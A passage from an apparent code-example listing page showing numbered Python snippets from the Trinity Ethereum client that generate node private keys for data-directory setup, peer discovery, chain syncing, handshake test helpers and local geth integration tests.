                is_under_path(trinity_config.data_dir, trinity_config.log_dir) and
                not any(trinity_config.data_dir.iterdir())
            )
        )
    )
    if should_create_logdir:
        trinity_config.log_dir.mkdir(parents=True, exist_ok=True)
        trinity_config.logfile_path.touch()
    elif not trinity_config.log_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base logging directory provided does not exist: `{0}`".format(
                trinity_config.log_dir,
            ),
            trinity_config.log_dir,
        )

    # Initialize chain, pid, ipc and enrdb directories
    os.makedirs(trinity_config.pid_dir, exist_ok=True)
    os.makedirs(trinity_config.ipc_dir, exist_ok=True)
    os.makedirs(trinity_config.node_db_dir, exist_ok=True)

    # Nodekey
    if trinity_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(trinity_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
Example No. 23
def initialize_data_dir(chain_config: ChainConfig) -> None:
    if is_under_xdg_trinity_root(chain_config.data_dir):
        os.makedirs(chain_config.data_dir, exist_ok=True)
    elif not os.path.exists(chain_config.data_dir):
        # we don't lazily create the base dir for non-default base directories.
        raise ValueError(
            "The base chain directory provided does not exist: `{0}`".format(
                chain_config.data_dir, ))

    # Chain data-dir
    os.makedirs(chain_config.database_dir, exist_ok=True)

    # Nodekey
    if chain_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(chain_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
Example No. 24
def _test():
    import signal
    from p2p import constants
    from p2p import ecies
    from p2p.exceptions import OperationCancelled

    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    loop = asyncio.get_event_loop()
    loop.set_debug(True)

    listen_host = '0.0.0.0'
    # Listen on a port other than 30303 in case we want to test against a local geth instance
    # running on that port.
    listen_port = 30303
    privkey = ecies.generate_privkey()
    addr = kademlia.Address(listen_host, listen_port, listen_port)
    bootstrap_nodes = tuple(
        kademlia.Node.from_uri(enode) for enode in constants.ROPSTEN_BOOTNODES)
    discovery = DiscoveryProtocol(privkey, addr, bootstrap_nodes)
    # local_bootnodes = [
    #     kademlia.Node.from_uri('enode://0x3a514176466fa815ed481ffad09110a2d344f6c9b78c1d14afc351c3a51be33d8072e77939dc03ba44790779b7a1025baf3003f6732430e20cd9b76d953391b3@127.0.0.1:30303')]  # noqa: E501
    # discovery = DiscoveryProtocol(privkey, addr, local_bootnodes)
    loop.run_until_complete(
        loop.create_datagram_endpoint(lambda: discovery,
                                      local_addr=('0.0.0.0', listen_port)))

    async def run():
        try:
            await discovery.bootstrap()
            while True:
                await discovery.lookup_random(CancelToken("Unused"))
                print("====================================================")
                print("Random nodes: ", list(discovery.get_random_nodes(10)))
                print("====================================================")
        except OperationCancelled:
            await discovery.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, discovery.cancel_token.trigger)

    loop.run_until_complete(run())
    loop.close()
Example No. 25
def _test():
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    peer_pool = HardCodedNodesPeerPool(ETHPeer, chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Example No. 26
    def do_start(self) -> None:
        trinity_config = self.context.trinity_config
        beacon_config = trinity_config.get_app_config(BeaconAppConfig)

        db_manager = create_db_consumer_manager(trinity_config.database_ipc_path)
        base_db = db_manager.get_db()  # type: ignore
        chain_db = db_manager.get_chaindb()  # type: ignore
        chain_config = beacon_config.get_chain_config()
        chain = chain_config.beacon_chain_class(base_db)

        if self.context.args.beacon_nodekey:
            from eth_keys.datatypes import PrivateKey
            privkey = PrivateKey(bytes.fromhex(self.context.args.beacon_nodekey))
        else:
            privkey = ecies.generate_privkey()

        server = BCCServer(
            privkey=privkey,
            port=self.context.args.port,
            chain=chain,
            chaindb=chain_db,
            headerdb=None,
            base_db=base_db,
            network_id=trinity_config.network_id,
            max_peers=DEFAULT_MAX_PEERS,
            bootstrap_nodes=None,
            preferred_nodes=None,
            event_bus=self.context.event_bus,
            token=None,
        )

        syncer = BeaconChainSyncer(
            chain_db,
            server.peer_pool,
            server.cancel_token,
        )

        loop = asyncio.get_event_loop()
        asyncio.ensure_future(exit_with_service_and_endpoint(server, self.context.event_bus))
        asyncio.ensure_future(server.run())
        asyncio.ensure_future(syncer.run())
        loop.run_forever()
        loop.close()
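
The beacon_nodekey argument read above expects a hex-encoded private key; a hedged one-liner for producing one, assuming Trinity's p2p.ecies is importable:

from p2p import ecies

# Print a fresh hex-encoded nodekey; bytes.fromhex() in do_start() will accept it.
print(ecies.generate_privkey().to_bytes().hex())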
Example No. 27
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import ETHPeer, HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    peer_pool = HardCodedNodesPeerPool(ETHPeer,
                                       chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey(),
                                       min_peers=5)
    asyncio.ensure_future(peer_pool.run())

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chaindb, peer_pool)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, syncer.cancel_token.trigger)

    async def run():
        try:
            await syncer.run()
        except OperationCancelled:
            pass
        await peer_pool.stop()

    loop.run_until_complete(run())
    loop.close()
Example No. 28
def _test() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument('-bootnode',
                        type=str,
                        help="The enode to use as bootnode")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.DEBUG
    if args.debug:
        log_level = DEBUG2_LEVEL_NUM
    logging.basicConfig(level=log_level,
                        format='%(asctime)s %(levelname)s: %(message)s')

    # Listen on a port other than 30303 so that we can test against a local geth instance
    # running on that port.
    listen_port = 30304
    privkey = ecies.generate_privkey()
    addr = kademlia.Address('127.0.0.1', listen_port, listen_port)
    if args.bootnode:
        bootstrap_nodes = tuple([kademlia.Node.from_uri(args.bootnode)])
    else:
        bootstrap_nodes = tuple(
            kademlia.Node.from_uri(enode)
            for enode in constants.ROPSTEN_BOOTNODES)

    ipc_path = Path(f"networking-{uuid.uuid4()}.ipc")
    networking_connection_config = ConnectionConfig(
        name=NETWORKING_EVENTBUS_ENDPOINT, path=ipc_path)

    async def run() -> None:
        socket = trio.socket.socket(family=trio.socket.AF_INET,
                                    type=trio.socket.SOCK_DGRAM)
        await socket.bind(('0.0.0.0', listen_port))
        async with TrioEndpoint.serve(
                networking_connection_config) as endpoint:
            service = DiscoveryService(privkey, addr, bootstrap_nodes,
                                       endpoint, socket)
            await TrioManager.run_service(service)

    trio.run(run)
Example No. 29
def _test():
    import signal
    from p2p import constants
    from p2p import ecies
    from p2p.exceptions import OperationCancelled

    logging.basicConfig(level=logging.DEBUG,
                        format='%(levelname)s: %(message)s')

    loop = asyncio.get_event_loop()
    loop.set_debug(True)

    listen_host = '0.0.0.0'
    # Listen on a port other than 30303 in case we want to test against a local geth instance
    # running on that port.
    listen_port = 30301
    privkey = ecies.generate_privkey()
    addr = kademlia.Address(listen_host, listen_port, listen_port)
    discovery = DiscoveryProtocol(privkey, addr, constants.MAINNET_BOOTNODES)
    # local_bootnodes = [
    #     'enode://0x3a514176466fa815ed481ffad09110a2d344f6c9b78c1d14afc351c3a51be33d8072e77939dc03ba44790779b7a1025baf3003f6732430e20cd9b76d953391b3@127.0.0.1:30303']  # noqa: E501
    # discovery = DiscoveryProtocol(privkey, addr, local_bootnodes)
    loop.run_until_complete(discovery.listen(loop))

    async def run():
        try:
            await discovery.bootstrap()
            while True:
                await discovery.lookup_random(CancelToken("Unused"))
        except OperationCancelled:
            # Give all tasks started by DiscoveryProtocol a chance to stop.
            await asyncio.sleep(2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, discovery.stop)

    loop.run_until_complete(run())
    loop.close()
Example No. 30
def _test():
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash', type=str, required=True, help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Example No. 31
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, FakeAsyncHeaderDB, connect_to_peers_loop)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(
        level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)

    peer_class: Type[HeaderRequestingPeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = FakeAsyncRopstenChain(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Example No. 32
async def test_lightchain_integration(request, event_loop):
    """Test LightChain against a local geth instance.

    This test assumes a geth/ropsten instance is listening on 127.0.0.1:30303 and serving light
    clients. In order to achieve that, simply run it with the following command line:

        $ geth -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
               -testnet -lightserv 90
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = LocalGethPeerPool(LESPeer, chaindb, ROPSTEN_NETWORK_ID, ecies.generate_privkey())
    chain = IntegrationTestLightChain(chaindb, peer_pool)
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(chain.run())
    await asyncio.sleep(0)  # Yield control to give the LightChain a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.stop())
        event_loop.run_until_complete(chain.stop())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while chaindb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)
    await asyncio.wait_for(wait_for_header_sync(n), 2)

    # https://ropsten.etherscan.io/block/11
    b = await chain.get_canonical_block_by_number(n)
    assert isinstance(b, FrontierBlock)
    assert b.number == 11
    assert encode_hex(b.hash) == (
        '0xda882aeff30f59eda9da2b3ace3023366ab9d4219b5a83cdd589347baae8678e')
    assert len(b.transactions) == 15
    assert isinstance(b.transactions[0], b.transaction_class)

    receipts = await chain.get_receipts(b.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(chain.peer_pool.peers) == 1
    head_info = chain.peer_pool.peers[0].head_info
    head = await chain.get_block_by_hash(head_info.block_hash)
    assert head.number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('95a48dca999c89e4e284930d9b9af973a7481287')
    contract_code = await chain.get_contract_code(head.hash, keccak(contract_addr))
    assert encode_hex(keccak(contract_code)) == (
        '0x1e0b2ad970b365a217c40bcf3582cbb4fcc1642d7a5dd7a82ae1e278e010123e')

    account = await chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Example No. 33
async def get_directly_linked_peers_without_handshake(
        peer1_class=LESPeer, peer1_chaindb=None,
        peer2_class=LESPeer, peer2_chaindb=None):
    """See get_directly_linked_peers().

    Neither the P2P handshake nor the sub-protocol handshake will be performed here.
    """
    if peer1_chaindb is None:
        peer1_chaindb = get_fresh_mainnet_chaindb()
    if peer2_chaindb is None:
        peer2_chaindb = get_fresh_mainnet_chaindb()
    peer1_private_key = ecies.generate_privkey()
    peer2_private_key = ecies.generate_privkey()
    peer1_remote = kademlia.Node(
        peer2_private_key.public_key, kademlia.Address('0.0.0.0', 0, 0))
    peer2_remote = kademlia.Node(
        peer1_private_key.public_key, kademlia.Address('0.0.0.0', 0, 0))
    initiator = auth.HandshakeInitiator(peer1_remote, peer1_private_key)
    peer2_reader = asyncio.StreamReader()
    peer1_reader = asyncio.StreamReader()
    # Link the peer1's writer to the peer2's reader, and the peer2's writer to the
    # peer1's reader.
    peer2_writer = type(
        "mock-streamwriter",
        (object,),
        {"write": peer1_reader.feed_data,
         "close": lambda: None}
    )
    peer1_writer = type(
        "mock-streamwriter",
        (object,),
        {"write": peer2_reader.feed_data,
         "close": lambda: None}
    )

    peer1, peer2 = None, None
    handshake_finished = asyncio.Event()

    async def do_handshake():
        nonlocal peer1, peer2
        aes_secret, mac_secret, egress_mac, ingress_mac = await auth._handshake(
            initiator, peer1_reader, peer1_writer)

        # Need to copy those before we pass them on to the Peer constructor because they're
        # mutable. Also, the 2nd peer's ingress/egress MACs are reversed from the first peer's.
        peer2_ingress = egress_mac.copy()
        peer2_egress = ingress_mac.copy()

        peer1 = peer1_class(
            remote=peer1_remote, privkey=peer1_private_key, reader=peer1_reader,
            writer=peer1_writer, aes_secret=aes_secret, mac_secret=mac_secret,
            egress_mac=egress_mac, ingress_mac=ingress_mac, chaindb=peer1_chaindb,
            network_id=1)

        peer2 = peer2_class(
            remote=peer2_remote, privkey=peer2_private_key, reader=peer2_reader,
            writer=peer2_writer, aes_secret=aes_secret, mac_secret=mac_secret,
            egress_mac=peer2_egress, ingress_mac=peer2_ingress, chaindb=peer2_chaindb,
            network_id=1)

        handshake_finished.set()

    asyncio.ensure_future(do_handshake())

    responder = auth.HandshakeResponder(peer2_remote, peer2_private_key)
    auth_msg = await peer2_reader.read(constants.ENCRYPTED_AUTH_MSG_LEN)

    # Can't assert return values, but checking that the decoder doesn't raise
    # any exceptions at least.
    _, _ = responder.decode_authentication(auth_msg)

    peer2_nonce = keccak(os.urandom(constants.HASH_LEN))
    auth_ack_msg = responder.create_auth_ack_message(peer2_nonce)
    auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)
    peer2_writer.write(auth_ack_ciphertext)

    await handshake_finished.wait()

    return peer1, peer2
Example No. 34
    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-mainnet', action="store_true")
    args = parser.parse_args()

    GENESIS_HEADER = ROPSTEN_GENESIS_HEADER
    NETWORK_ID = ROPSTEN_NETWORK_ID
    if args.mainnet:
        GENESIS_HEADER = MAINNET_GENESIS_HEADER
        NETWORK_ID = MAINNET_NETWORK_ID
    DemoLightChain = LightChain.configure(
        'RPCDemoLightChain',
        vm_configuration=MAINNET_VM_CONFIGURATION,
        network_id=NETWORK_ID,
        privkey=ecies.generate_privkey(),
    )

    chaindb = ChainDB(LevelDB(args.db))
    try:
        chaindb.get_canonical_head()
    except CanonicalHeadNotFound:
        # We're starting with a fresh DB.
        chain = DemoLightChain.from_genesis_header(chaindb, GENESIS_HEADER)
    else:
        # We're reusing an existing db.
        chain = DemoLightChain(chaindb)

    app = App(chain)
    web.run_app(app, port=8080)
Example No. 35
    def __init__(self, remote: kademlia.Node, privkey: datatypes.PrivateKey) -> None:
        self.remote = remote
        self.privkey = privkey
        self.ephemeral_privkey = ecies.generate_privkey()
Example No. 36
def _test():
    """
    Create a Peer instance connected to a local geth instance and log messages exchanged with it.

    Use the following command line to run geth:

        ./build/bin/geth -vmodule p2p=4,p2p/discv5=0,eth/*=0 \
          -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
          -testnet -lightserv 90
    """
    import argparse
    import signal
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')

    # The default remoteid can be used if you pass nodekeyhex as above to geth.
    nodekey = keys.PrivateKey(decode_hex(
        "45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8"))
    remoteid = nodekey.public_key.to_hex()
    parser = argparse.ArgumentParser()
    parser.add_argument('-remoteid', type=str, default=remoteid)
    parser.add_argument('-light', action='store_true', help="Connect as a light node")
    args = parser.parse_args()

    peer_class = ETHPeer  # type: ignore
    if args.light:
        peer_class = LESPeer  # type: ignore
    remote = Node(
        keys.PublicKey(decode_hex(args.remoteid)),
        Address('127.0.0.1', 30303, 30303))
    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    network_id = RopstenChain.network_id
    loop = asyncio.get_event_loop()
    peer = loop.run_until_complete(
        asyncio.wait_for(
            handshake(remote, ecies.generate_privkey(), peer_class, chaindb, network_id),
            HANDSHAKE_TIMEOUT))

    async def request_stuff():
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer
        block_hash = decode_hex(
            '0x59af08ab31822c992bb3dad92ddb68d820aa4c69e9560f07081fa53f1009b152')
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.sub_proto.send_get_block_headers(block_hash, 1)
            peer.sub_proto.send_get_block_bodies([block_hash])
            peer.sub_proto.send_get_receipts([block_hash])
        else:
            peer = cast(LESPeer, peer)
            request_id = 1
            peer.sub_proto.send_get_block_headers(block_hash, 1, request_id)
            peer.sub_proto.send_get_block_bodies([block_hash], request_id + 1)
            peer.sub_proto.send_get_receipts(block_hash, request_id + 2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, peer.cancel_token.trigger)

    asyncio.ensure_future(request_stuff())
    loop.run_until_complete(peer.run())
    loop.close()